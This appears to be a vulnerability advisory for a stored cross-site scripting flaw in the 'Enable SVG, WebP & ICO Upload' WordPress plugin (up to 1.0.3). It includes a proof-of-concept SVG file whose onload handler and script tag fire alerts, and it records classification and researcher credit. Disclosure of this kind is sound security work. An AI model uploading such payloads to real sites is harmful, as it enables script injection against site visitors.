WordPress Plugin Vulnerabilities

Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS

Description

The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.

Proof of Concept

1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   onload="javascript:alert(/XSS/)"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   id="svg3013"
   sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>

Affects Plugins

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Mateus Machado Tesser
Submitter
Mateus Machado Tesser
Verified
Yes

Timeline

Publicly Published
2023-06-23 (about 10 months ago)
Added
2023-06-23 (about 10 months ago)
Last Updated
2023-06-23 (about 10 months ago)

Other